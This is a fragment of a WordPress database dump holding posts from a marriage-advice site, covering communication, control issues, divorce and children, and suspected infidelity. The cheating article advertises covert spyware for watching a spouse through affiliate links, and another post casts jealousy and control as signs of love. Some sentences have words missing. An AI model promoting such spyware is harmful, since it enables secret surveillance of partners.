		</div>\n				<div class=\"format_text entry-content\">\n				  <p>A couple of weeks ago, we went to the movies and right before the actual movie started, there was a 30 second commercial on the screen reminding us that “Silence is golden.” While this is helpful advice for a movie theatre, we don’t think it works very well when it comes to communicating in relationships.<span id=\"more-139\"></span></p>\n<p>The problem is that many people in relationships think that if they just keep silent and not say what they are thinking or feeling, their relationship will be better off than if they had said what was on their mind.</p>\n<p><em>While this sounds good in theory– it doesn’t work in reality.</em></p>\n<p>When we keep our feelings to ourselves, it may temporarily keep the peace and keep the relationship going smoothly but in the long run, this creates distance, separation, mistrust and dries up passion like a weed in the desert.</p>\n<p>In our previous long term relationships, both of us kept silent about our thoughts and feelings that were important to us because we didn’t want to make waves in the relationship. While this wasn’t the only contributing factor, both of our previous marriages ended in divorce.</p>\n<p>In our relationship, we made an agreement early on to be honest about our thoughts and feelings with each other no matter how difficult or painful this might be.</p>\n<p>One of the contributors to our “<a rel=\"nofollow\" href=\"../go/stayorgo/\">Should You Stay or Should You Go?”</a> book told her story about how she didn’t keep silent in her relationship.</p>\n<p>She told us that she was best friends and engaged to a man who lived in a city several states away from hers. Sometime after he had moved to her city and they had decided to get married, she began feeling that the relationship would not work.</p>\n<p>She agonized for weeks, and after much prayer, she told him her painful truth–that she felt in her heart that their relationship “wasn’t right” and there were too many differences between them. She told us that once she was honest with herself (and with him), her pain disappeared.</p>\n<p>Now we’re not saying that everyone has to know every thought and feeling that you have. We are saying that if you want to live an authentic, vibrant life and perhaps have a connected, passionate, alive relationship, silence is not golden.</p>\n<p>We have found that the best way to tell your thoughts and feelings so that the other person can hear is to simply say what is true for you without pointing the finger at them (making them wrong.)</p>\n<p>Sometimes this is easier said than done when the subject is a particularly thorny one between the two of you.</p>\n<p>But what we have found is that if you both can listen to each other until there is some sense of understanding, without emotionally or physically running away, you can work through almost any communication issue or challenge.</p>\n<p>Withholding your thoughts or feelings–hoping that it will all  be okay if you just keep silent– is rarely a strategy that works.</p>\n<p>Making and keeping the agreement that you will both share your thoughts and feelings with each other and stay open to each other without becoming defensive helps to create more trust and intimacy in the relationship.</p>\n<p>We invite you to make this agreement or other agreements with the important people in your life.</p>\n<p>If you are interested in finding out more about how to have better communication in your relationships, you’ll find many more stories, specific suggestions and ideas in <a rel=\"nofollow\" href=\"/\">“Communication Magic”</a></p>\n<p>  </p>\n			  </div>\n			</div>\n		</div>','How to solve your Communication Problems – improving on silence','A couple of weeks ago, we went to the movies and right before the actual movie started, there was a 30 second commercial on the screen reminding us that \"S','publish','open','open','','communication-problems-is-silence-really-golden','','','2017-10-04 09:42:28','2017-10-04 09:42:28','',0,'http://www.bournesociety.org.uk/communication-problems-is-silence-really-golden',0,'post','',0),(56,1,'2017-10-04 09:21:06','2017-10-04 09:21:06','<div id=\"content\" class=\"hfeed\">\r\n<div id=\"post-153\" class=\"post-153 post type-post status-publish format-standard hentry category-marriage tag-control-freak tag-keep-your-marriage tag-marriage-problems tag-nancy-wasson tag-relationship tag-resentment post_box top\">\r\n<div class=\"headline_area\">\r\n<h1 class=\"entry-title\">Horrible Control Issues That Cause Marriage Problems! Read our guide on avoiding this</h1>\r\n<p class=\"headline_meta\"></p>\r\n\r\n</div>\r\n<div class=\"format_text entry-content\">\r\n\r\nHave you ever been irritated because your spouse does things differently than you do? Do you get upset if he or she has different opinions and makes different choices than you would? If so, you have bumped up against some of your own personal <em>control issues</em> and triggers in your marriage. Here are three important points to consider:<span id=\"more-153\"></span>\r\n<h3><strong>1. Fear underlies control issues.</strong></h3>\r\n<span style=\"text-decoration: underline;\">Control issues</span> cause problems in many marriages. The feelings you experience at those times can be very intense and may include rage at the other person. Most people feel more secure when others around them mirror their opinions, beliefs, and choices. Your safety needs and fears contribute to your wanting others to be just like you. The old adage, “There is safety in numbers,” refers to this primitive fear of standing alone.\r\n\r\nAlso, many people feel more in control when they can predict the behavior of others and when others meet their expectations. Then they don’t have to experience the discomfort of growing, changing, or stretching themselves. Instead, they can pretend that their world is logical, orderly, predictable, and safe.\r\n<h3><strong>2. Thinking your spouse should be just like you harms your marriage.</strong></h3>\r\nYour control issues are also triggered by viewing your spouse as an extension of yourself. This perception can result in trying to dictate which clothes your spouse wears, how she wears her hair, who she is friends with, what political views she holds, and what she can or cannot do. While your spouse may initially make some changes trying to keep the peace, you are creating a parent-child dynamic in your relationship that will eventually foster rebellion and resentment.\r\n<h3><strong>3. Using insults and name calling are attempts to regain control.</strong></h3>\r\nWhile nothing sinister is involved in many control issues in relationships, pathological behavior can be triggered in some instances. For example, a partner who is angry that the spouse did not follow his dictates could become physically and emotionally abusive. The partner may think he has the right to “punish” the other person. Name calling and derogatory put-downs, such as “What a stupid thing to do,” are often used to re-establish control over the other person.\r\n\r\nIt’s easy to point a finger at your spouse and to state that he or she needs to change. It’s hard to face your own unresolved issues head-on and take responsibility for how you need to change. As you become more aware of <strong>control issues</strong> in your marriage, the starting place for change is always with yourself and your response to what is happening.\r\n<h3></h3>\r\n</div>\r\n</div>\r\n</div>','Control Issues That Cause Marriage Problems','Control issues cause problems in many marriages. Do you get upset if he or she has different opinions and makes different choices than you would? Maybe you have personal control issues yourself.','publish','open','open','','control-issues-that-cause-marriage-problems','','','2017-10-04 09:41:46','2017-10-04 09:41:46','',0,'http://www.bournesociety.org.uk/control-issues-that-cause-marriage-problems',0,'post','',0),(57,1,'2017-10-04 09:21:06','2017-10-04 09:21:06','<div id=\"content\" class=\"hfeed\">\r\n<div id=\"fb-root\"></div>\r\n<div id=\"post-7\" class=\"post-7 post type-post status-publish format-standard hentry category-marriage post_box top\">\r\n<div class=\"headline_area\">\r\n<h1 class=\"entry-title\">Did You Hear What I Just Said… The very best 10 steps on How to Really Listen To Your Spouse</h1>\r\n<p class=\"headline_meta\"></p>\r\n\r\n</div>\r\n<div class=\"format_text entry-content\">\r\n<div class=\"wpfblike\" style=\"height: 40px;\"></div>\r\n<div class=\"twitter_button\" style=\"float: right; margin-left: 10px;\"></div>\r\n<div class=\"tweetmeme_button\" style=\"float: right; margin-left: 10px;\"></div>\r\nSpouses who don’t talk to each other much is a sign of a marriage in trouble because no marriage stands a chance without efficient communication. In order to communicate effectively in a marriage or relationship you need to say to yourself; what is it that I am trying to say? Are you simply trying to be understood, to get what you want or do you have some other purpose behind the words that you are saying?<span id=\"more-7\"></span>\r\n\r\nA great deal of communication is physical by way of actions and body language and only a small part of our communication takes place in words, which we say and listen to all day. Although we may believe that someone is really listening to and understanding what we are saying, the fact is this is very often not the case.\r\n\r\nWhen it is us doing the talking, the person we are talking to is usually thinking what they are going to say back or creating some kind of mental image, which might be completely different to what you actually said to them. We all have our own mental frames of reference, which can alter the message which we are listening to. We are desperately trying to make ourselves understood by the other person, with words going back and forth like arrows but most of them are just missing the target.\r\n<h3>Do Not Play the Blame Game</h3>\r\nIn an argument, many married couples only want to prove that they are in the right and their partner is wrong. Bringing up the others personal shortcomings and using spiteful words and blame as a weapon against them will make the other person feel inadequate. They won’t hear the real message behind the words, just the anger and self-righteousness. To stop this, agree to stop blaming one another and give each other a proper chance to speak and be heard. You have to come to a mutual understanding, not prove you are completely right and the other is completely wrong\r\n<h3>Learn To Listen Effectively</h3>\r\nMarital communication is not simply about spouses talking to each other but also listening to and hearing what is being said.\r\n\r\nTo really hear what someone is saying you have to try to forget your own point of view and allow yourself to feel what the other person is trying to say. If someone wants you to listen to what they have to say don’t talk, just do what they are asking you to do…listen. They may not want your feedback just someone to hear and understand what they are feeling.\r\n\r\nSome people appear to be listening but are only really engaged in their own thoughts. To overcome this, repeat to them what you think they just said so that they know that what they are saying is getting through to you. If you want to talk, wait a minute for your turn, and they will listen to you.\r\n<h3>Real Listening</h3>\r\nListening, real listening is what many married couples fail to do. Real listening is done not just with the ears but with all of our consciousness. It is being tolerant of something you may not want to hear. It is opening your mind up to other points of view and realities. Real listening lets your partner know that you respect their thoughts and that you really care for them.\r\n\r\n</div>\r\n</div>\r\n</div>','Did You Hear What I Just Said… How to Really Listen To Your Spouse - ','','publish','open','open','','did-you-hear-what-i-just-said-how-to-really-listen-to-your-spouse-save-your-marriage','','','2017-10-04 09:40:33','2017-10-04 09:40:33','',0,'http://www.bournesociety.org.uk/did-you-hear-what-i-just-said-how-to-really-listen-to-your-spouse-save-your-marriage',0,'post','',0),(58,1,'2017-10-04 09:20:13','2017-10-04 09:20:13','<div id=\"content\" class=\"hfeed\">\n\n<div id=\"fb-root\"></div>\n					<script type=\"text/javascript\"><![CDATA[\n						window.fbAsyncInit = function()\n						{\n							FB.init({appId: null, status: true, cookie: true, xfbml: true});\n						};\n						(function()\n						{\n							var e = document.createElement(\'script\'); e.async = true;\n							e.src = document.location.protocol + \'//connect.facebook.net/en_US/all.js\';\n							document.getElementById(\'fb-root\').appendChild(e);\n						}());\n					]]></script><div class=\"post-63 post type-post status-publish format-standard hentry category-marriage post_box top\" id=\"post-63\">\n				<div class=\"headline_area\">\n					<h1 class=\"entry-title\">Different Ways Men Express Their Love				</h1>\n				</div>\n				<div class=\"format_text entry-content\">\n<div class=\"wpfblike\" style=\"height: 40px;\"><like href=\"http://saveyourmarriage.co.uk/different-ways-men-express-their-love/\" layout=\"default\" show_faces=\"false\" width=\"400\" action=\"like\" colorscheme=\"light\" send=\"true\"></like></div><div class=\"twitter_button\" style=\"float: right; margin-left: 10px;\"></div>\n<div class=\"tweetmeme_button\" style=\"float: right; margin-left: 10px;\"><a class=\"tm_button\" rel=\"&amp;style=normal&amp;hashtags=marriage&amp;b=2\" href=\"../different-ways-men-express-their-love/\"></a></div>\n<p>I can sleep with her, marry her, take care of her, but love   that’s something else, said Tony, a married man in his late forties. Guys  don’t like to talk about love. They don’t know what to say. Of course guys do  love. But they express it differently.<span id=\"more-63\"></span></p>\n<p><!--ADBOX--></p>\n<p>Despite this fact, most women do not feel happy unless they  hear those golden words, I love you. Men need to hear them as well. And yet, as  much as men want love, many fight it to the last minute. Love can make men feel  vulnerable, childlike, and unable to do what is expected of them, especially  those who believe they’re functioning in a dog eat dog world.</p>\n<p>Still men do  love, and different types of men express their love differently. In fact, love  means different things to a man, at different times in his life. A woman needs  to be alert to who the man she is with is, and what love means to him. As  discussed in my book, What He Can’t Tell You And Needs To Say, there are  broadly, Four Types Of Men, and for each of these types, love will mean  something different, and certainly be expressed in different manners.</p>\n<p>Although most women wait to hear the golden words, I Love  You, here are 5 different ways that men use to express what they are feeling.  The first way is simply by saying I Love You. Actually, saying these words is  a huge step for some men. It means a lot more than simply expressing a feeling.  For some it feels like a life commitment, for others it is fraught with danger.</p>\n<p>When I say I love you, said Steve, I feel like I’m taking  my life in my hands and giving it to her. It is scary. I’ve got to really trust  her and know she won’t throw my love away in order to actually say the words to  her. In this case, the fear of rejection comes up strongly. Rejection is  enormously painful for most men, and saying, “I Love You, can be an  invitation to be hurt. Most men must feel very secure in the relationship and  in the woman’s feelings for him, before he will dare say those words.</p>\n<p>For others, saying, I love you, means, I am offering a  commitment. I am going to be here to do things for you. For many men, love is  expressed through action, so these words are a promise of what is to follow.  Simply by saying these words they feel they are agreeing to be there to give to  her and support her. If they don’t do it, they’ll feel like a heel.</p>\n<p>For others, the words means, I am not leaving, or I will  always be faithful. This can be very scary for some men. They feel the words  themselves are a promise, and if the promise is broken, they will suffer as  well. However, there is another type of man, The Lovers, Dreamers and Peter  Pans, who enjoy falling in love and letting the world know it. These men will say  I Love You easily. There are many different motives behind their words  though. Some say it to get a woman to make love with him, others to enter into  a romantic fantasy, some to feel as though they are the great lover of all  time. By saying these words, others seem to be offering the woman the world,  (that they have no intention of giving). Others say it just for the sheer  pleasure of seeing how good it makes the woman feel, and how powerful this  makes him.</p>\n<p>When a woman hears those precious words, she should step  back a moment and put them in context. What do they mean to this particular  man? Are there other ways she might also realize that he loves and is caring  for her?</p>\n<p>Another way men express their love is through bringing gifts  to the woman. There are many different kinds of gifts a man can give. The  obvious ones include those wrapped in packages, candy, flowers, special notes.  However, there are others that a woman may or may not be aware of. For example,  for some men, giving their time to you, is a gift. They spend more time with  you, and less with family and friends, this is their way of saying they love  you. They are choosing to be with you. For them, the conclusion should be  obvious  that they love you.</p>\n<p>There are other gifts that can be given as well, standing up  for you during a difficult time, going with you to your family, doing things  for you, attending important functions with you, planning trips, dates or  outings, and putting you first in their thoughts. As many men are not so  comfortable with expressing their feelings directly, these behaviours are  indicators that they care a great deal. Many expect the woman to realize that  these actions are being generated because they love.</p>\n<p>Another one of the Four Types of Men are the perfectionists,  controllers, and addicts (work addicts, love addicts). For some of these men, a  way of expressing love is through being jealous, or possessive. (Other types of  men can fall into this as well) Although this may not feel good to many women  for these men it is can be a sign that they care about you, you’re important to  them and they don’t want anyone else near. They do not want to share your  attention. It is especially upsetting to these men if you speak of or look at  other guys.</p>\n<p>Although being controlled is not being loved, in the pure  sense of the word, to many men and women, the two overlap. Many women feel  cared for when the man wants to know where she’s going during the day, who  she’s with, and what she’s doing. It’s a sign that he cares a great deal, said  Renee. Sure, it can be annoying that he’s so controlling, but if he wasn’t,  truthfully, I don’t think I’d feel loved or cared about. For Renee this kind  of behaviour produces a sense of security. Even though he’s controlling her, at  least she’s on his mind, and in this way she feels she’s controlling him as  well. She translates this to mean that the man is involved; he cares about what  she is doing. He wants to make sure that she does not spend more time with  others than she does with him.</p>\n<p>Other men say, I love you through physical displays. They  are affectionate and spend quality time making love to you. Some men can most  easily express their feelings during lovemaking. After being intimate, they  feel as though they have loved you, and often feel loved as well. The physical  contact breaks down barriers and provides a feeling of closeness that cannot be  so easily be obtained in another manner for them. Most women need affection and  foreplay as well as sexuality. For the women this is what makes them feel  loved. Some women require hearing words of spoken during this time as well.</p>\n<p>This can be a complex area, because sex can mean so many different things to  different individuals. But when a man is open, giving and affectionate with a  woman on an on-going basis, it is often his way of expressing love. For him  love means meeting her needs and having his needs met as well. Some use  sexuality to avoid or cover? up areas in  the relationship that might be difficult. They feel that if the sex is good,  everything else will fall into place. Usually, when the sex is reluctant, or  not happening, it is an indicator that something is missing emotionally, or  that conflict exists in the relationship. Sex is a sensitive barometer to what  is going on in all aspects of one’s life.</p>\n<p>Another way of saying I Love You is taking you home to  meet the family, (and close, meaningful friends). This is often an indicator  that the man has deeper feelings for you. Not only does it say that he is proud  of you, but he wants to connect you with the people who mean the most to him.  He wants you to care about them, and for them to care about you as well. This  is a sure sign that intimacy and love is increasing for him, that you are  becoming a significant part of his life.</p>\n<p>Some women complain a great deal about not having met the  family, being kept separate and apart. When this goes on for too long in a  relationship, it can be a sign that the depth of his feelings for you, and his  involvement is lacking.</p>\n<p>Some men compartmentalize relationships; they have someone  for dating, someone for sex, someone else for the kind of love that leads to  marriage. By being aware of the people in his life that he introduces you to,  and includes you with, you can get a good idea of how he operates in this area.  Does he want you in all parts of his life, or is this a limited relationship?  Love, in the deepest sense, includes sharing all parts of ourselves with  another.</p>\n<p>It is helpful to keep a little journal of your relationship.  So many acts and expressions of love go unnoticed and unfelt, because we simply  get used to them, or are too busy to stop and take note  or to stop and say  thank you. In the journal of your relationship, take a few minutes each evening  to note, what you received that day, and also what you gave. Write it down. Be  specific. List everything, like phone calls, kind words, a surprise visit, etc.  It will be amazing to you to realize all the ways your partner is giving to you  and it will be wonderful to find new ways to give back to him.</p>\n<p> </p></div>\n								</div>\n		</div>','How men express their love','','publish','open','open','','different-ways-men-express-their-love-save-your-marriage','','','2017-10-04 09:44:26','2017-10-04 09:44:26','',0,'http://www.bournesociety.org.uk/different-ways-men-express-their-love-save-your-marriage',0,'post','',0),(59,1,'2017-10-04 09:20:25','2017-10-04 09:20:25','<div id=\"content\" class=\"hfeed\">\n\n			<div class=\"post-26 post type-post status-publish format-standard hentry category-affairs tag-cheating tag-discover tag-entire tag-help tag-relationship tag-yellow-pages post_box top\" id=\"post-26\">\n				<div class=\"headline_area\">\n					<h1 class=\"entry-title\">Discover if your husband or wife is cheating on you</h1>\n					<p class=\"headline_meta\"> </p>\n				</div>\n				<div class=\"format_text entry-content\">\n<p> </p>\n<p>Do you have a feeling in your gut that’s something wrong in your  relationship? That maybe, just maybe, your partner’s being unfaithful?  If you do, then you have a decision to make and several options to  choose from.</p>\n<p>First, think about how sure you are of their infidelity. If you  aren’t sure at all, then option 1  confronting them right now, without  wasting any time  is completely out of the question. Doing so could  ruin the relationship because it would highlight, rightly or wrongly, that  you don’t trust your partner.<span id=\"more-26\"></span></p>\n<p>The second option: ignore your suspicions, assume they’re unfounded  and that they always will be, that nothing’s going on, and continue as  normal. This option’s one many people take, either to avoid being  confronted with an ugly truth  that their lover’s doing some extra  loving’ behind their backs  or because they fear they’re being unfair  to their partners by being suspicious of them and doubtful of their devotedness.</p>\n<blockquote class=\"right\"><p>As seen on CHEATERS<br />\nYou’ve seen the TV Show. When the show ends, it asks its viewers to visit their website. And what software do you see them promoting? That’s right, <a rel=\"nofollow\" href=\"../go/pcpandora/\">PC Pandora!</a></p></blockquote>\n<p>Third option: do something to help eradicate your suspicions  find  out either way what’s going on, if your partner’s cheating on you or if  they’re being faithful.</p>\n<p>Okay, let’s assume option three is the one for you. You want to find  out the truth and don’t want to simply ignore your gut instinct and  continue on as normal. What methods of investigation, ways of  discovering the facts, are there at your disposal?</p>\n<p>1. The simplest way (often considered the first step), and something  you might have already begun doing, is looking for obvious signs of  potential betrayal. Your partner smells of a fragrance, perfume or  after-shave you don’t recognize. They’ve been leaving the house for  work half an hour earlier than they’ve ever done before, for no  apparent reason. They don’t seem to enjoy sex with you as they used to,  or choose to avoid it completely whenever they can. Keep an eye out for  these surface signs of potential infidelity  in a way, looking for  them and recording them in your mind or on paper can be considered  harmless, it’s free information there to be noticed if only you’ll look.</p>\n<p>2. After the obvious potential signs of cheating dry up, or when you  feel you’re at a dead end looking for and analyzing them, more  forthright, headstrong action may be called for.</p>\n<blockquote class=\"right\"><p>“I  am currently a deployed soldier. My intentions with this program was to  make sure my wife wasn’t cheating on me. I have come to find out,she is”<a rel=\"nofollow\" href=\"../go/acespy/\">AceSpy</a></p></blockquote>\n<p>Some people, at this  point, reach straight for the Yellow Pages, thumbing right to the  private investigator section. That’s one option, sure, but there are  things you can do yourself before calling in a third party. First, you  could try setting a trap. It may sound a little primeval, like catching  a wild animal, but really it’s more like a test. These tests can take  many forms. For example, arrange a trip, say you’re going away for a  couple days to visit your folks, or friends, and use that time to keep  track of some of the things your partner does. You don’t necessarily  need to sit outside in the car with a pair of binoculars 24/7, just pay  attention to key times when your partner would  if you were home  do  certain things, like leave the house for work, come home, etc. You’d be  surprised how many cheaters embrace these rare, private opportunities  to further their affairs and indulge in some extra-marital ‘relations’.</p>\n<p>There are also subtler ways of testing your partner’s fidelity and  faithfulness. One of them is called the ‘gossip’ test. It involves  bringing up the topic of cheating using a fictional third party, such  as one of your work colleagues or friends. Mention, without hinting at  your suspicion of them in the slightest, that your friend (or whoever  you’ve chosen to use for this test) confided in you that they’re  cheating on their partner. Most people are, to some degree or another   even if it’s just to maintain conversation  interested in a little  gossip, especially if it involves a subject as juicy as infidelity. But  when cheaters hear the topic of cheating brought up, they tend to  silently panic  a rush of nerves sweeps their consciousness. Have they  been rumbled? Is this a test? Am I reacting like a non-cheater would to  this kind of chat? Keep a close watch on how YOUR partner reacts it  could provide a telling insight into their current state of mind, how  they feel about cheating, and whether or not  when you boil it right  down  you can trust them to not cheat on you.</p>\n<p class=\"greenbox\"> </p></div>\n			</div>\n		</div>','Here\'s how to find out if your wife/husband is cheating','Do you have a feeling in your gut that\'s something wrong in your relationship? That maybe, just maybe, your partner\'s being unfaithful? If you do, th','publish','open','open','','discover-if-your-husband-or-wife-is-cheating-on-you-save-your-marriage','','','2017-10-04 09:44:18','2017-10-04 09:44:18','',0,'http://www.bournesociety.org.uk/discover-if-your-husband-or-wife-is-cheating-on-you-save-your-marriage',0,'post','',0),(60,1,'2017-10-04 09:20:45','2017-10-04 09:20:45','<h2>Helping children cope with divorce</h2>\r\nChildren go through a range of emotions once they learn their parents are getting a <em>divorce</em>. This can end up with children blaming themselves in some way for the divorce. They’ll remember each of the times their parents had a disagreement over them and feel it is their own fault.\r\n\r\nNone of these conditions are suitable for children and there’s little doubt suffering through all this will leave indelible psychological scars from this extremely unhappy period of their life. <a href=\"http://www.bournesociety.org.uk/contact\">Please get in touch with us for more information</a>.\r\n<h2>Should you stay together for the children\'s sake?</h2>\r\nThe fact is, many couples decide not to get a <strong>divorce</strong> no matter what simply for the benefit of their children. They want to break free and to start a new life but they don’t. Years later, they may regret doing this and realise that staying in the marriage for their children’s sake was a big mistake for all concerned. They certainly weren’t happy and chances are everyone in the household was suffering because of what was going on emotionally.\r\n<h2>Divorce and children – the effects</h2>\r\nWhat is happening to so many children living with parents in an unhappy marriage right now has to be addressed.\r\n\r\nThese children are seriously affected by all the abuse they see, whether it be verbal, emotional or the worst of all, physical abuse. In many cases, the children will see controlling behaviours such as affection or money being withheld for one spouse to exert control over the other.\r\n\r\nA parent may apply for a DVO if they feel threatened or have been experiencing violence from their other half. The court will decide rules that should be followed for the person that has committed the offence. If you need help to successfully gain a DVO for acts of violence, <a href=\"https://www.emersoncriminallaw.com.au/domestic-violence-law/\" target=\"_blank\" rel=\"noopener\">visit this website for more advice</a>.<a href=\"/\"><img class=\"alignnone size-full wp-image-356\" src=\"http://www.bournesociety.org.uk/wp-content/uploads/2017/10/children.jpg\" alt=\"Happy children during a divorce\" width=\"960\" height=\"640\" /></a>\r\n<h2>Children pick up on abusive behaviour</h2>\r\nIt is the emotional state of children that very often keeps people in a marriage when they want out though. They have heard all the horror stories about children with trust issues and relationship issues because of their parents being divorced and experiences they have witnessed firsthand.\r\n\r\nChildren pick up on a lot of behaviours. It is inevitable they will sense all the tension that is there between you and your spouse. They are going to be right there in the middle of things if there is still a lot of unresolved conflict going on. <em>It can be very unhealthy for them to see such issues taking place.</em>\r\n\r\nThe things that generally cause the biggest problems are seeing all the negative things that happen before the actual divorce. Seeing your parents call each other nasty names or throwing stuff around and fighting aren’t the sort of things that a child is likely to forget. Obviously there are bound to be many difficult issues when going through a divorce but the main thing is do everything you can stop your children from seeing them.\r\n\r\n<a href=\"http://www.family-lawfirm.co.uk/Articles/Divorce-and-Separation/How-to-Avoid-a-Messy-Divorce.aspx\">Messy divorces</a> where each spouse is blaming the other and getting the children in the middle of it aren’t going to benefit anyone at all. Whenever you say nasty things about your ex in front of your children you simply cause them more hurt. When all is said and done, that person is still their parent and still someone they probably love and respect.\r\n<h2>Talk about the divorce to your children</h2>\r\nBe certain that you take the time to speak to your children about what they feel about the divorce. It is very important for parents to encourage their children to talk openly about how the divorce is affecting them. Too many children hide what they truly feel as they don’t want to make things more difficult for the parents. They know you are under <a href=\"http://my.clevelandclinic.org/healthy_living/stress_management/hic_warning_signs_of_emotional_stress_when_to_see_your_doctor.aspx\">emotional stress</a> and they don’t want to make things worse. <strong>Children can be a lot wiser and compassionate than you realise.</strong>\r\n\r\nIf you take the right approach you can <a href=\"http://www.helpguide.org/mental/children_divorce.htm\" target=\"_blank\" rel=\"noopener\">go through a divorce</a> and still have a decent <a href=\"http://life.familyeducation.com/parenting/discipline/36653.html\">relationship with your children</a> afterwards. Make sure that they know they can come to either parent whenever they have any problems. As long as you reassure them that everything is going to be fine and make them feel loved and safe you should get through your divorce without your children, or you, suffering from future problems.','Divorce and Children - Avoiding Divorce Problems','Children go through a range of emotions once they learn their parents are getting a divorce. Avoiding divorce problems affecting your children is paramount.','publish','open','open','','divorce-and-children-avoiding-divorce-problems','','','2018-07-27 12:13:29','2018-07-27 12:13:29','',0,'http://www.bournesociety.org.uk/divorce-and-children-avoiding-divorce-problems',0,'post','',0),(61,1,'2017-10-04 09:21:02','2017-10-04 09:21:02','<div id=\"content\" class=\"hfeed\">\n\n			<div class=\"post-79 post type-post status-publish format-standard hentry category-marriage tag-affair tag-anthony-bradley tag-help tag-help-marriage tag-how-to-save-your-marriage tag-jealousy tag-marriage-advice tag-marriage-after-an-affair tag-marriage-counseling tag-marriage-divorce tag-marriage-help tag-marriage-problem tag-marriage-problems tag-relationship tag-sexless-marriage post_box top\" id=\"post-79\">\n				<div class=\"headline_area\">\n					<h1 class=\"entry-title\">Help to stop your divorce and .</h1>\n					<p class=\"headline_meta\"> </p>\n				</div>\n				<div class=\"format_text entry-content\">\n<p>If you’re having marriage problems you might be thinking about divorce without trying to discover more about how you can save the marriage. Thankfully though, there are now lots of ways of learning how to  alone.<span id=\"more-79\"></span>There are a few highly experienced marriage guidance experts who have created easily affordable marriage ebooks or courses with all the information needed to help you discover what has gone wrong with your marriage and how to save it from divorce.</p>\n<p>Many of the authors have years of actual marriage counseling experience behind them so they have seen every kind of marriage problem and can give you the best marriage advice possible to help you to . They have managed to pack all their years of knowledge into easy to understand <a href=\"/\">marriage books or courses</a> which will teach you the best tried-and-tested methods to improve a marriage or stop a divorce, in your own time and at very low cost.</p>\n<p>The many thousands of people who decided to buy one of these marriage help books wanted one thing;</p>\n<p><em>“Help me to save my marriage”</em></p>\n<p>And the fact is that a high percentage of people who made the decision to buy one of the ebooks have saved their marriage thanks to the marriage-saving techniques given in them. These marriage books will show you how to deal with a whole range of marriage problems such as;</p>\n<ul><li>How to stop a divorce.</li>\n<li>How to save a marriage after an affair.</li>\n<li>What to do about a sexless marriage.</li>\n<li>How to cope with jealousy.</li>\n</ul><p><em>Don’t take my word for it though…</em></p>\n<p>If you truly want to deal with your marriage problems then it can’t hurt to visit some of their websites and read some of the many true testimonials from satisfied customers and you will see that it is possible to . Other people did it,  so why not you?</p>\n<p>By the way, most of these marriage  guides offer a 100% money-back guarantee so you have nothing to lose by trying out their proven methods which have helped thousands of couples with their marriage problems.</p>\n<p>You can read reviews of the best marriage and relationship books on our <a href=\"/\">reviews page</a> to give you an idea of what they contain and how they can help you to .</p>\n<p>You might also like to read some of the many <a href=\"../category/all-articles/\">marriage articles</a> here on   which have been written by top experts in marital advice, including <a href=\"../category/all-articles/affairs/\">recovering from affairs</a>, and they should give you a head start on understanding and solving your marriage problems and preventing a divorce.</p>\n<p> </p></div>\n			</div>\n		</div>','Help to stop your divorce and save your marriage. - ','If you\'re having marriage problems you might be thinking about divorce without trying to discover more about how you can save the marriage. Thankfully thou','publish','open','open','','help-to-stop-your-divorce-and-save-your-marriage-save-your-marriage','','','2017-10-04 09:21:02','2017-10-04 09:21:02','',0,'http://www.bournesociety.org.uk/help-to-stop-your-divorce-and-save-your-marriage-save-your-marriage',0,'post','',0),(63,1,'2017-10-04 09:25:36','2017-10-04 09:25:36','','tool-belt','','inherit','open','closed','','tool-belt','','','2017-10-04 09:25:36','2017-10-04 09:25:36','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/tool-belt.jpg',0,'attachment','image/jpeg',0),(64,1,'2017-10-04 09:25:37','2017-10-04 09:25:37','','tools','','inherit','open','closed','','tools','','','2017-10-04 09:25:37','2017-10-04 09:25:37','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/tools.jpg',0,'attachment','image/jpeg',0),(65,1,'2017-10-04 09:25:39','2017-10-04 09:25:39','','top of beer','','inherit','open','closed','','top-of-beer','','','2017-10-04 09:25:39','2017-10-04 09:25:39','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/top-of-beer.jpg',0,'attachment','image/jpeg',0),(66,1,'2017-10-04 09:25:40','2017-10-04 09:25:40','','top of rail','','inherit','open','closed','','top-of-rail','','','2017-10-04 09:25:40','2017-10-04 09:25:40','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/top-of-rail.jpg',0,'attachment','image/jpeg',0),(67,1,'2017-10-04 09:25:40','2017-10-04 09:25:40','','torch','','inherit','open','closed','','torch','','','2017-10-04 09:25:40','2017-10-04 09:25:40','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/torch.jpg',0,'attachment','image/jpeg',0),(68,1,'2017-10-04 09:25:41','2017-10-04 09:25:41','','tourist attraction','','inherit','open','closed','','tourist-attraction','','','2017-10-04 09:25:41','2017-10-04 09:25:41','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/tourist-attraction.jpg',0,'attachment','image/jpeg',0),(69,1,'2017-10-04 09:25:42','2017-10-04 09:25:42','','tower bridge','','inherit','open','closed','','tower-bridge','','','2017-10-04 09:25:42','2017-10-04 09:25:42','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/tower-bridge.jpg',0,'attachment','image/jpeg',0),(70,1,'2017-10-04 09:25:42','2017-10-04 09:25:42','','towergate logo','','inherit','open','closed','','towergate-logo','','','2017-10-04 09:25:42','2017-10-04 09:25:42','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/towergate-logo.png',0,'attachment','image/png',0),(71,1,'2017-10-04 09:25:43','2017-10-04 09:25:43','','tracing','','inherit','open','closed','','tracing','','','2017-10-04 09:25:43','2017-10-04 09:25:43','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/tracing.jpg',0,'attachment','image/jpeg',0),(72,1,'2017-10-04 09:25:44','2017-10-04 09:25:44','','trade business','','inherit','open','closed','','trade-business','','','2017-10-04 09:25:44','2017-10-04 09:25:44','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/trade-business.jpg',0,'attachment','image/jpeg',0),(73,1,'2017-10-04 09:25:45','2017-10-04 09:25:45','','tradesmen','','inherit','open','closed','','tradesmen','','','2017-10-04 09:25:45','2017-10-04 09:25:45','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/tradesmen.jpg',0,'attachment','image/jpeg',0),(74,1,'2017-10-04 09:25:45','2017-10-04 09:25:45','','traditonal phone','','inherit','open','closed','','traditonal-phone','','','2017-10-04 09:25:45','2017-10-04 